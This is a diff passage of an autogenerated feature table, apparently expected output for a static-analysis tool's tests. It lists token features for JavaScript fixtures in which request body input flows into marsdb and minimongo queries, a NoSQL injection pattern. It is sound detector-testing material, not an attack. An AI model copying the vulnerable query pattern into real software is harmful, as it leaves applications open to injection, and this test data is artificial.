query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query = {} | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query = {} | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:9:12:18 | query = {} | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:17:12:18 | {} | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:17:12:18 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:17:12:18 | {} | enclosingFunctionBody | req res query query title req body title doc find query err data | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:17:12:18 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:12:17:12:18 | {} | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:7 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:7 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:7 | query | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:7 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:7 | query | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:13 | query.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:13 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:13 | query.title | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:13 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:13 | query.title | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:30 | query.t ... y.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:30 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:30 | query.t ... y.title | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:30 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:3:13:30 | query.t ... y.title | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:9:13:13 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:9:13:13 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:9:13:13 | title | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:9:13:13 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:9:13:13 | title | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:19 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:19 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:19 | req | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:19 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:19 | req | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:24 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:24 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:24 | req.body | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:24 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:24 | req.body | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:17:13:30 | req.body.title | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:21:13:24 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:21:13:24 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:21:13:24 | body | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:21:13:24 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:21:13:24 | body | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:26:13:30 | title | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:26:13:30 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:26:13:30 | title | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:26:13:30 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:13:26:13:30 | title | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:5 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:5 | doc | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:5 | doc | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:5 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:5 | doc | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:10 | doc.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:10 | doc.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:10 | doc.find | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:10 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:10 | doc.find | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | doc.fin ... => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | doc.fin ... => {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | doc.fin ... => {}) | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | doc.fin ... => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | doc.fin ... => {}) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | exceptional return of doc.fin ... => {}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | exceptional return of doc.fin ... => {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | exceptional return of doc.fin ... => {}) | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | exceptional return of doc.fin ... => {}) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:3:16:36 | exceptional return of doc.fin ... => {}) | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:7:16:10 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:7:16:10 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:7:16:10 | find | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:7:16:10 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:7:16:10 | find | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | calleeImports | marsdb | @@ -1355,6 +7292,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:12:16:16 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | 'arguments' object of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | 'arguments' object of anonymous function | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | calleeImports | marsdb | @@ -1364,24 +7306,201 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | fileImports | body-parser express marsdb | | autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | (err, data) => {} | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | exceptional return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | exceptional return of anonymous function | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | return of anonymous function | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:19:16:35 | return of anonymous function | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:20:16:22 | err | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:20:16:22 | err | contextSurroundingFunctionParameters | (req, res)\n(err, data) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:20:16:22 | err | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:20:16:22 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:20:16:22 | err | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:25:16:28 | data | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:25:16:28 | data | contextSurroundingFunctionParameters | (req, res)\n(err, data) | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:25:16:28 | data | enclosingFunctionBody | req res query query title req body title doc find query err data | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:25:16:28 | data | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/marsdb.js:16:25:16:28 | data | fileImports | body-parser express marsdb | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:0 | this | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | doc | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | doc | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | doc | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:1:1:1 | require | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:13 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:13 | express | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express ... press") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express ... press") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:7:1:34 | express ... press") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:23 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:23 | require | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | exceptional return of require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | exceptional return of require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | exceptional return of require("express") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | require("express") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | require("express") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:17:1:34 | require("express") | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:1:25:1:33 | "express" | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:11 | minimongo | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:11 | minimongo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:11 | minimongo | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimon ... mongo") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimon ... mongo") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimon ... mongo") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimongo | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimongo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:3:2:34 | minimongo | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:21 | require | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | exceptional return of require("minimongo") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | exceptional return of require("minimongo") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | exceptional return of require("minimongo") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | require("minimongo") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | require("minimongo") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:15:2:34 | require("minimongo") | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:2:23:2:33 | "minimongo" | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:12 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:12 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:12 | bodyParser | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyPar ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyPar ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyPar ... arser") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyParser | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:3:3:37 | bodyParser | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:22 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:22 | require | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | exceptional return of require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | exceptional return of require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | exceptional return of require ... arser") | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | require ... arser") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | require ... arser") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:16:3:37 | require ... arser") | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:3:24:3:36 | "body-parser" | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:11 | LocalDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:11 | LocalDb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:11 | LocalDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb ... emoryDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb ... emoryDb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:5:5:32 | LocalDb ... emoryDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:23 | minimongo | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:23 | minimongo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:23 | minimongo | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:32 | minimongo.MemoryDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:32 | minimongo.MemoryDb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:15:5:32 | minimongo.MemoryDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:25:5:32 | MemoryDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:25:5:32 | MemoryDb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:5:25:5:32 | MemoryDb | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:4 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:4 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:4 | db | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db = new LocalDb() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db = new LocalDb() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:3:6:20 | db = new LocalDb() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | exceptional return of new LocalDb() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | exceptional return of new LocalDb() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | exceptional return of new LocalDb() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | new LocalDb() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | new LocalDb() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:8:6:20 | new LocalDb() | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:12:6:18 | LocalDb | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:6:12:6:18 | LocalDb | 